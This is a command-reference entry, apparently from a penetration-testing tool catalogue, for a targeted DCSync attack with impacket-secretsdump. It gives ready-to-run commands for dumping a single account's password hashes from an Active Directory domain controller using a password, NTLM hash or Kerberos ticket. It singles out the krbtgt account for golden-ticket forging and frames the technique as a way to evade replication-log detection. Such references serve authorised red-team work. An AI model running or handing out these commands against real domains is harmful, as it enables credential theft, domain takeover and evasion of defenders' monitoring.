Impacket Targeted DCSync (Single User)

DCSync only one specific account instead of replicating the whole NTDS. Massively reduces noise on the wire and in the DC's directory replication logs. Useful when you only need krbtgt, a domain admin, or a single service account.

Tool
impacket-secretsdump
Category
Credential Attacks / Hash Dumping
Platform
linux
Requires
password
Protocols
SMB, RPC

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-secretsdump -just-dc-user <target_user> '<domain>/<user>:<password>@<dc-ip>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-secretsdump -just-dc-user <target_user> -hashes ':<hash>' '<domain>/<user>@<dc-ip>'

Kerberos Ticket requires Kerberos ticket

impacket-secretsdump -k -no-pass -just-dc-user <target_user> '<domain>/<user>@<dc-fqdn>'

Krbtgt Only (for Golden) requires password

impacket-secretsdump -just-dc-user 'krbtgt' '<domain>/<user>:<password>@<dc-ip>'

Examples

impacket-secretsdump -just-dc-user krbtgt 'CORP/admin:Password123!@10.10.10.10'
impacket-secretsdump -k -no-pass -just-dc-user administrator 'CORP/admin@dc01.corp.local'

Tags

impacket secretsdump dcsync targeted stealth krbtgt

References